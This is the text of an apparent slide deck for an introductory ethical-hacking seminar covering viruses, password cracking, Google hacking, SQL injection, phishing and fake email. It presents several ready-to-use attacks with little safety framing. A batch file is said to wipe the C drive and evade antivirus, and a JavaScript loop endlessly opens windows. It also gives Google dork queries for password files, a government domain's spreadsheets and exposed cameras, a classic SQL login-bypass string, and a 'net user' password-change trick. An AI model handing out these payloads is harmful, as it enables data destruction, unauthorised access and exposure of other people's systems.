INFORMATION SECURITYHow secure are you……?

Agenda

• Network’s Exposure to Security Threats• What is Information Security And Ethical Hacking• Two Major Aspects - Desktop & Internet Security• Live Demonstrations of Attacks

“By the end of 2015, 95% of enterprises will be infected with undetected, financially motivated, targeted threats that evaded their traditional perimeter and host defenses”- By Gartner, Top Ten Key Predictions, 2012

security predictions in 2012

Network’s Exposures To Threats

Two Major Aspects Of Security

Desktop and internet security

Make Dangerous Virus In A MinuteWe will create this virus using batch file programming. This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus. 

1. Open Notepad and copy below code into it.

Open Notepad and copy below code into it

@Echo offDel C:\ *.* |y

SAM = Security Account Manager

• The Passwords are stored in SAM fileCracking Tools :ERD CommanderPH Crack

and many more…

Cracking Login Password

That’s easy… but admin rights… hm…

OR we can Change the Password…

C:\> net user username password

You need the admin rights !

But you can change Passwords of Other Admin Users !

The three major threats to computer world…!!

Virus & Worms

Keylogger

Trojan Horse

Today almost 87% of all viruses/worms are spread through the Internet.

Symptoms

• The system might start hanging.

• Softwares and applications often starts crashing

• System may become unpredictable.

• In some extreme cases OS may also crash.

AND

• Worms… These generally don’t perform any malicious activity.

• They reside in the system and make copies of itself

• These eat up the system resources

Lets Code a Virus ! !Is it difficult ?

Trojan Horse

Trojan… is a fatal gift !

A Trojan is an infection that steals information.

It then sends the information to a specified location over the internet.

It makes the computer prone to hackers by making Backdoors.

Attacker Victim

KEYLOGGER

They log all the keys that you type.

This runs in the background and is totally invisible.

Trojans often have the keyloggers with them and they mail the log to their masters.

Watch your key strokes…!

Windows Registry

Know how change in registries effects your system……!

All initialization and configuration information used by windows are stored in the registry.

Network Scanners

Network Scanners used to find all the live systems present in the network with the Information about IP Address, Port Number, Services running on that ports, Vulnerabilities, installed applications etc.

Some Tools:-

Angry IP ScannerGFI LAN GuardLook At LAN

Finding live Hosts…!

Sniffers

Sniffers used to Capture the data packet from the network by applying some Poisoning such as ARP Poisoning.

Some Tools:-

Cain and abelEttercap

hmmmmmmmmmm…!

Cryptography

Art of Secret writing to convert plaintext(Readable format) into cipher text(Non-Readable format) by using some algorithms with the help of a Key.

Encrypters…!

Stagenography

Art of Secret writing to Hide one file behind the other file. Example a text message can be bind behind the image or video file.

Hiding……..

How Do I Protect My Data ?

•Use Antiviruses with Updated Signatures

•Use Firewalls

•Do not open Untrusted executables

•Use Cryptography Techniques

I will mess it up…!

World Wide Web…

Lets move to internet…

Web Developer’s Nightmare

Website Exploits…

GoogleHacking

SQL Injection

DOS Attack

DNS Spoofing

Remote System Scanning

Google CrackingUsing Google

Google is more than just a Search Engine. Special keywords can perform better Searches.

Google crawls the web …!

<Google Commands>site, intitle, filetype, allintitle, inurl

Database Cracking

Hmmmmmmmmmmm…..

Filetype:xls hry.nic.in

Advance Googling

Intitle:index .of master.passwd

Password Cracking

Camera Cracking

Inurl:indexframe.shtml axis

Lets see how is this done…!

Lets see how a simple SQL injection works…

' OR '1'='1

● ● ● ● ● ● ● ● ● ● ●

Select * from table where user= ‘ " & TextBox1.Text & “ ’ AND pass= '" & TextBox2.Text & “’;

Backend SQL string

Select * from table where user= ‘ ‘ OR ‘1’=‘1 ’ AND pass= ‘ ‘ OR ‘1’=‘1 ’;

String after SQL Injection

user= ‘ ‘ OR ‘1’=‘1 ’ AND pass= ‘ ‘ OR ‘1’=‘1 ’;

We Know that… is always True…!

SQL attack…

Phishing

Fake Emails

Dangers for Internet Users…

Surfing Online…

Social Networking

Abuse

Browser Hacking

Browser Cracking• Use scripts links to run in Browser.• These scripts change the behavior of Browser.• Example: javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24;

x4=300; y4=200; x5=300; y5=200; DI=document.images; DIL=DI.length; function A(){for(i=0; i<DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=Math.sin (R*x1+i*x2+x3)*x4+x5; DIS.top=Math.cos(R*y1+i*y2+y3)*y4+y5}R++}setInterval('A()',5); void(0)

javascript:b=[]; a=document.images; for(wt=0; wt<a.length; wt++){a[wt].style.position='relative'; b[b.length]=a[wt]}; j=0; setInterval('j++; for(wt=0; wt<b.length; wt++){b[wt].style.left=Math.sin((6.28/a.length)*wt+j/10)*10}; void(0)',1); void(0);

Lets Do It.........

Blast Virus<html><body><script language="javascript">while(1){w1=window.open();w1.document.write("<center><font color=red

size=5> blaaaast!!</font></center>");}</script></body></html>

Lets Do It.........

Lets Send a Fake Email !

Fake EmailsSending Fake mails with Fake headersE-mails can be sent to anyone from any Id

It is used also in Spamming

Its bush@georgebush.com ...

How to Catch Fake Emailers

Analyze the headersUse sites like

“ whatismyipaddress.com ” to trace the IP address of fake mail

Go to “Regional Internet Registries” like Apnic, Afrinic, etc.

Get the email of ISP of attacker & lodge the complaint.

Catch me if u can…

Password?

E-mail: “There’s a problem with your Gmail account”

User thinks it’s Gmail.com

(But its

Gmail.org)

Password sent

Phishing Attack

Lets make a fake page…

Preventing Phishing Read the URL carefully…

Keep a suspicious eye over info demanding E-mails.

Anti-phishing Tools can be effective…

Use your Brain…

This is just a Trailer movie is about to Begin…

Thank YouFor any query and assistance,

Kindly contact:

Appin Technology lab